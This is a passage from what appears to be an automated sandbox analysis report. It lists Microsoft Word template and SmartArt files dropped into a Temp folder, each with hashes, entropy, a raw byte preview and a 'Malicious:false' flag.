                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.A.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74BC.tmp\ThemePictureAccent.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6448
                                                                                                                                                Entropy (8bit):7.897260397307811
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                                                                                                                                MD5:42A840DC06727E42D42C352703EC72AA
                                                                                                                                                SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                                                                                                                                SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                                                                                                                                SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74CC.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):246
                                                                                                                                                Entropy (8bit):3.5039994158393686
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                                                                                MD5:16711B951E1130126E240A6E4CC2E382
                                                                                                                                                SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                                                                                SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                                                                                SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74CC.tmp\TabbedArc.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3683
                                                                                                                                                Entropy (8bit):7.772039166640107
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                                                                                MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                                                                                SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                                                                                SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                                                                                SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74FC.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):374
                                                                                                                                                Entropy (8bit):3.5414485333689694
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX8FaE3f8AWqlQqr++lcWimqnKOE3QepmlJ0+3FbnKfZObdADryMluxHZypo:fxnyj9AWI+acgq9GHmD0wbnKYZAH/lMf
                                                                                                                                                MD5:2F7A8FE4E5046175500AFFA228F99576
                                                                                                                                                SHA1:8A3DE74981D7917E6CE1198A3C8E35C7E2100F43
                                                                                                                                                SHA-256:1495B4EC56B371148EA195D790562E5621FDBF163CDD8A5F3C119F8CA3BD2363
                                                                                                                                                SHA-512:4B8FBB692D91D88B584E46C2F01BDE0C05DCD5D2FF073D83331586FB3D201EACD777D48DB3751E534E22115AA1C3C30392D0D642B3122F21EF10E3EE6EA3BE82
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.e.x.t. .S.i.d.e.b.a.r. .(.A.n.n.u.a.l. .R.e.p.o.r.t. .R.e.d. .a.n.d. .B.l.a.c.k. .d.e.s.i.g.n.)...d.o.c.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74FC.tmp\Text Sidebar (Annual Report Red and Black design).docx

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):47296
                                                                                                                                                Entropy (8bit):6.42327948041841
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ftjI1BT8N37szq00s7dB2wMVJGHR97/RDU5naXUsT:fJIPTfq0ndB2w1bpsE
                                                                                                                                                MD5:5A53F55DD7DA8F10A8C0E711F548B335
                                                                                                                                                SHA1:035E685927DA2FECB88DE9CAF0BECEC88BC118A7
                                                                                                                                                SHA-256:66501B659614227584DA04B64F44309544355E3582F59DBCA3C9463F67B7E303
                                                                                                                                                SHA-512:095BD5D1ACA2A0CA3430DE2F005E1D576AC9387E096D32D556E4348F02F4D658D0E22F2FC4AA5BF6C07437E6A6230D2ABF73BBD1A0344D73B864BC4813D60861
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........<dSA4...T...P.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^\-o..D....n_d.jq...gwg.t........:?/..}..Vu5...rQ..7..X.Q."./g..o....f....YB......<..w?...ss..e.4Y}}...0.Y...........u3V.o..r...5....7bA..Us.z.`.r(.Y>.&DVy.........6.T...e.|..g.%<...9a.&...7...}3:B.......<...!...:..7w...y..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74FD.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):332
                                                                                                                                                Entropy (8bit):3.547857457374301
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXSpGLMeKlPaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyipTIw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:4EC6724CBBA516CF202A6BD17226D02C
                                                                                                                                                SHA1:E412C574D567F0BA68B4A31EDB46A6AB3546EA95
                                                                                                                                                SHA-256:18E408155A2C2A24D91CD45E065927FFDA726356AAB115D290A3C1D0B7100402
                                                                                                                                                SHA-512:DE45011A084AB94BF5B27F2EC274D310CF68DF9FB082E11726E08EB89D5D691EA086C9E0298E16AE7AE4B23753E5916F69F78AAD82F4627FC6F80A6A43D163DB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .h.a.r.v.a.r.d.a.n.g.l.i.a.2.0.0.8.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74FD.tmp\harvardanglia2008officeonline.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):284415
                                                                                                                                                Entropy (8bit):5.00549404077789
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:N9G5o7Fv0ZcxrStAtXWty8zRLYBQd8itHiYYPVJHMSo27hlwNR57johqBXlwNR2b:y
                                                                                                                                                MD5:33A829B4893044E1851725F4DAF20271
                                                                                                                                                SHA1:DAC368749004C255FB0777E79F6E4426E12E5EC8
                                                                                                                                                SHA-256:C40451CADF8944A9625DD690624EA1BA19CECB825A67081E8144AD5526116924
                                                                                                                                                SHA-512:41C1F65E818C2757E1A37F5255E98F6EDEAC4214F9D189AD09C6F7A51F036768C1A03D6CFD5845A42C455EE189D13BB795673ACE3B50F3E1D77DAFF400F4D708
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2008</xsl:text>.....</xsl:when>.... <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>Harvard - Anglia</xsl:text>.. </xsl:when>.. <x

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74FE.tmp\CircleProcess.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):16806
                                                                                                                                                Entropy (8bit):7.9519793977093505
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:eSMjhqgJDGwOzHR3iCpK+QdLdfufFJ9aDn9LjDMVAwHknbz7OW:eSkhqglGwERSAHQdLhDn9AKokv7H
                                                                                                                                                MD5:950F3AB11CB67CC651082FEBE523AF63
                                                                                                                                                SHA1:418DE03AD2EF93D0BD29C3D7045E94D3771DACB4
                                                                                                                                                SHA-256:9C5E4D8966A0B30A22D92DB1DA2F0DBF06AC2EA75E7BB8501777095EA0196974
                                                                                                                                                SHA-512:D74BF52A58B0C0327DB9DDCAD739794020F00B3FA2DE2B44DAAEC9C1459ECAF3639A5D761BBBC6BDF735848C4FD7E124D13B23964B0055BB5AA4F6AFE76DFE00
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD74FE.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):254
                                                                                                                                                Entropy (8bit):3.4720677950594836
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                                                                                MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                                                                                SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                                                                                SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                                                                                SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD750F.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):252
                                                                                                                                                Entropy (8bit):3.48087342759872
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                                MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                                SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                                SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                                SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD750F.tmp\PictureFrame.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4326
                                                                                                                                                Entropy (8bit):7.821066198539098
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7510.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):292
                                                                                                                                                Entropy (8bit):3.5026803317779778
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                                SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                                SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                                SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7510.tmp\gosttitle.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):251032
                                                                                                                                                Entropy (8bit):5.102652100491927
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7511.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):260
                                                                                                                                                Entropy (8bit):3.4895685222798054
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX4cPBl4xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyPl4xoGHmD0+dAH/luWvv
                                                                                                                                                MD5:63E8B0621B5DEFE1EF17F02EFBFC2436
                                                                                                                                                SHA1:2D02AD4FD9BF89F453683B7D2B3557BC1EEEE953
                                                                                                                                                SHA-256:9243D99795DCDAD26FA857CB2740E58E3ED581E3FAEF0CB3781CBCD25FB4EE06
                                                                                                                                                SHA-512:A27CDA84DF5AD906C9A60152F166E7BD517266CAA447195E6435997280104CBF83037F7B05AE9D4617323895DCA471117D8C150E32A3855156CB156E15FA5864
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.a.r.y.i.n.g.W.i.d.t.h.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7511.tmp\VaryingWidthList.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3075
                                                                                                                                                Entropy (8bit):7.716021191059687
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                                                                                                                                MD5:67766FF48AF205B771B53AA2FA82B4F4
                                                                                                                                                SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                                                                                                                                SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                                                                                                                                SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD758F.tmp\Content.inf

